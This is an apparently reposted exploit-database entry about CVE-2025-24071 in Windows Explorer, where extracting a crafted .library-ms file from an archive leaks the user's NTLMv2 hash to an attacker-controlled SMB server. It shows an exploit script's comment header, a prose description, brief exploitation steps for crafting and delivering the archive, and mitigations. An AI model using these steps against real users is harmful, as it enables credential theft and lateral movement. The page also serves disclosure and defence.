Windows 10/11中的一个漏洞允许通过包含特殊.library-ms文件的ZIP或RAR档案自动泄露用户的NTLMv2哈希。当提取此类档案时,Windows Explorer会自动连接到攻击者控制的SMB服务器,导致哈希泄露,从而引发信息泄露攻击。 2025-6-4 08:56:17 Author: cxsecurity.com(查看原文) 阅读量:34 收藏
Windows Explorer - NTLM Hash Disclosure via .library-ms in ZIP Archive
#!/usr/bin/env python3 # Exploit Title: Windows Explorer - NTLM Hash Disclosure via .library-ms in ZIP Archive # Exploit Author: Mohammed Idrees Banyamer # Twitter/GitHub: @mbanyamer # Date: 2025-05-27 # CVE: CVE-2025-24071 # Vendor: Microsoft # Affected Versions: Windows 10/11 (All supporting .library-ms and SMB) # Tested on: Windows 11 (23H2) # Type: Local / Remote (NTLM Leak) # Platform: Windows # Vulnerability Type: Information Disclosure # Description: # Windows Explorer automatically initiates an SMB authentication request when a # .library-ms file is extracted from a ZIP archive. This causes NTLM credentials # (in hashed format) to be leaked to a remote SMB server controlled by the attacker. # No user interaction is required beyond extraction. # Country : Jordan Description: CVE-2025-24071 is a vulnerability that allows attackers to capture a victim’s NTLMv2 hash automatically upon extracting a specially crafted RAR or ZIP archive containing a .library-ms file. This file references an attacker-controlled SMB path within its <simpleLocation> tag. Once the archive is extracted, Windows Explorer and the Windows Search Indexing service (SearchProtocolHost.exe) automatically parse the .library-ms file to generate metadata, icons, or previews. This parsing process initiates an unsolicited SMB connection to the attacker's server, resulting in the NTLMv2 hash of the victim being sent without any user interaction Impact: NTLMv2 hash disclosure Enables pass-the-hash attacks Facilitates lateral movement within internal networks Exploitation Steps: Create a .library-ms file pointing to a remote SMB share. Compress it into a RAR or ZIP archive. Deliver the archive to the target. Upon extraction, the victim’s system initiates an SMB request to the attacker, leaking the NTLM hash. Requirements: Windows system with Explorer and Indexing Services enabled Outbound SMB traffic not restricted Mitigation: Block outbound SMB (ports 445 and 139) Disable Windows Search Indexing if unnecessary Avoid extracting archives from untrusted sources
Thanks for you comment!
Your message is in quarantine 48 hours.
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
如有侵权请联系:admin#unsafe.sh